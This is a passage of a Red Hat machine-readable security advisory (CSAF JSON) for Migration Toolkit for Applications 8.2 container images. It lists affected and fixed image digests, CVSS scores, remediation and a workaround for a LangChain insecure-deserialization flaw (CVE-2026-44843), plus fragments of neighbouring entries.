"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jupyter-server: Jupyter Server: Remote Code Execution via stored Cross-Site Scripting in nbconvert handlers"
},
{
"cve": "CVE-2026-44843",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-05-26T21:01:18.783998+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2481695"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in LangChain, a framework for building agents and large language model (LLM)-powered applications. Older runtime code paths within LangChain deserialize application-controlled payloads using overly broad object allowlists. A remote attacker can exploit this by supplying specially crafted LangChain serialized constructor dictionaries, leading to the instantiation of classes with untrusted arguments. This can result in the disclosure of sensitive information and potential partial compromise of data integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "langchain: LangChain: Information disclosure and data integrity compromise via insecure deserialization",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in LangChain allows a remote attacker to achieve information disclosure and partial data integrity compromise. The flaw arises from overly broad object allowlists in older runtime code paths, which can deserialize attacker-controlled payloads and instantiate classes with untrusted arguments. Red Hat products integrating LangChain are affected if they process untrusted structured input and utilize deprecated APIs such as RunnableWithMessageHistory, astream_log(), or astream_events(version=\"v1\"), potentially leading to prompt injection or sensitive data exposure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44843"
},
{
"category": "external",
"summary": "RHBZ#2481695",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481695"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44843",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44843"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44843",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44843"
},
{
"category": "external",
"summary": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-pjwx-r37v-7724",
"url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-pjwx-r37v-7724"
}
],
"release_date": "2026-05-26T19:47:35.328000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications using LangChain should avoid passing untrusted structured input directly to load() or loads() functions. Instead, ensure all incoming untrusted data is validated and canonicalized into an inert schema before being processed by LangChain. Additionally, migrate away from deprecated LangChain APIs, including RunnableWithMessageHistory, astream_log(), and astream_events(version=\"v1\"), as these older code paths are more susceptible to insecure deserialization.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "langchain: LangChain: Information disclosure and data integrity compromise via insecure deserialization"
},
{
"cve": "CVE-2026-45292",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-28T17:02:14.674828+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
